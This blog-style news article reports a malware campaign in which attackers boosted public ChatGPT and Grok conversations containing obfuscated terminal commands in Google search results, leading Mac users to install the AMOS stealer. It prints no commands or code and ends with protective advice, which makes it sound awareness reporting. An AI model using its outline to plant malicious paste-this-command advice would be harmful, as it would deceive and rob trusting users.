ChatGPT logo glowing ominously above terminal with malicious code and Google search

Hackers Used ChatGPT and Google to Install Malware. Here’s How They Did It

Byadmin

Google searches just became way more dangerous. Hackers found a clever trick that turns AI chatbots into malware delivery systems.

The attack is disturbingly simple. Criminals create fake ChatGPT conversations that give malicious computer commands. Then they pay Google to boost these conversations to the top of search results. When someone searches for basic tech help, they find the poisoned advice and unknowingly install malware.

Security firm Huntress discovered this attack after investigating an infected Mac. The victim had simply searched “clear disk space on Mac” on Google. They clicked what looked like helpful ChatGPT advice. Then they pasted a command into their terminal. That single action installed AMOS malware, which steals passwords and personal data.

The Attack Exploits Trust in AI

What makes this attack so effective? It bypasses every traditional warning sign we’ve learned to watch for.

You don’t download any files. You don’t click suspicious links. You don’t install weird programs. Instead, you just follow advice from two sources you already trust: Google and ChatGPT.

That trust is the weapon. Most people have used Google thousands of times. ChatGPT has dominated headlines for years. So when Google shows you a ChatGPT link at the top of search results, your brain says “this must be legit.”

Huntress tested this attack vector on both ChatGPT and Grok. Both platforms replicated the vulnerability. Hackers can easily create malicious conversations, make them public, and pay to boost them in search rankings.

Terminal Commands Are the Delivery Method

The core trick relies on getting victims to paste commands into their computer’s terminal or command prompt.

For most people, the terminal looks intimidating. It’s that black screen with white text that shows up in hacker movies. But modern troubleshooting guides often include terminal commands because they’re precise and universal.

Hackers pay Google to boost malicious ChatGPT conversations in search

So when ChatGPT suggests “just paste this command to free up space,” it feels like standard tech support. The victim has no reason to question it. Plus, the command often contains encoded or obfuscated malware that looks like gibberish to untrained eyes.

Once executed, these commands give hackers remote access to install whatever malware they want. In the documented case, they installed AMOS, which specifically targets Mac users to steal credentials and sensitive data.

Google Left the Malicious Link Up for Hours

Here’s the concerning part. After Huntress published their research exposing this attack, the malicious ChatGPT link stayed live on Google for at least 12 hours.

That means even after security researchers identified and documented the threat, Google’s systems didn’t immediately remove it. Potentially thousands more people could have fallen victim during that window.

This response time raises questions about how quickly Google can react to these emerging threats. Traditional malware distribution through downloads or email gets flagged relatively fast. But malicious AI conversations hiding in plain sight? That’s new territory.

Moreover, while that specific link eventually disappeared, nothing stops attackers from creating hundreds more. The attack method itself remains viable as long as chatbots allow public conversations and Google accepts payment to promote them.

Other AI Platforms Likely Vulnerable Too

Huntress specifically tested ChatGPT and Grok, but other AI assistants probably face similar risks.

Claude, Gemini, Perplexity, and dozens of smaller chatbots all allow conversations that could be weaponized the same way. If users can make chats public and search engines can index them, the attack vector exists.

Terminal commands install AMOS malware which steals passwords and data

The problem isn’t really the AI itself. These chatbots generate responses based on prompts. When someone asks “how do I clear disk space,” the AI provides helpful commands. That’s exactly what it’s designed to do.

Instead, the vulnerability exists in the combination of public visibility, paid promotion, and user trust. Attackers exploit the ecosystem around AI, not the technology itself.

How to Protect Yourself Right Now

This threat is active today. So here’s what you need to do immediately.

Never paste commands without understanding them first. If a website or chatbot tells you to paste something into your terminal or browser address bar, stop. Ask yourself: do I know exactly what this command does?

Verify advice through multiple sources. Don’t trust a single ChatGPT conversation, even if Google shows it first. Check official documentation, forums, or ask a tech-savvy friend.

Be extra suspicious of terminal commands. Legitimate tech support rarely requires you to paste complex commands into your terminal. When you see strings of encoded text or unusual characters, that’s a massive red flag.

Question sponsored results. Just because Google shows something first doesn’t mean it’s trustworthy. Attackers paid to put it there. Scroll past ads and look for established tech support resources.

Use common sense with permissions. If pasting a command asks for your administrator password, pause. Legitimate disk cleanup tools don’t typically need elevated permissions.

The Bigger Problem With AI Trust

This attack reveals something uncomfortable about our relationship with AI assistants.

Huntress tested attack vector on both ChatGPT and Grok platforms

We’ve been conditioned to trust them. Companies spent billions marketing these tools as helpful, smart, and reliable. Now that trust has become a vulnerability that criminals can exploit.

The attack succeeds precisely because ChatGPT and Google have built credibility. Nobody would fall for this if the advice came from “TotallyLegitHackerSite dot ru.” But when it comes from household names? Our guard drops.

Plus, AI makes the scam scalable. Attackers can generate thousands of malicious conversations targeting different search terms. They can customize commands for Windows, Mac, and Linux. They can optimize for different languages and regions.

Traditional phishing required individual attention. But AI-powered attacks can cast a much wider net with minimal effort.

What Needs to Change

Both Google and AI companies need to address this vulnerability fast.

Google should implement better screening for promoted AI content. If someone pays to boost a ChatGPT link, maybe verify that the conversation doesn’t contain malicious commands. That seems like a reasonable safety check before accepting payment.

ChatGPT and other AI platforms should add warnings when conversations include terminal commands. A simple pop-up saying “verify this command before executing it” could prevent infections. Even better, they could analyze commands for known malware patterns.

Meanwhile, search engines need faster response times. Twelve hours between disclosure and removal is too slow when malware is actively spreading. Automated systems should flag suspicious patterns immediately.

But ultimately, user education matters most. We need to teach people that AI assistants aren’t infallible and that Google rankings don’t guarantee safety. Critical thinking remains essential even when technology looks trustworthy.

This attack won’t be the last time criminals weaponize AI. So stay skeptical, verify everything, and never paste commands you don’t fully understand. Your digital safety depends on it.

Similar Posts

Leave a Reply

Your email address will not be published. Required fields are marked *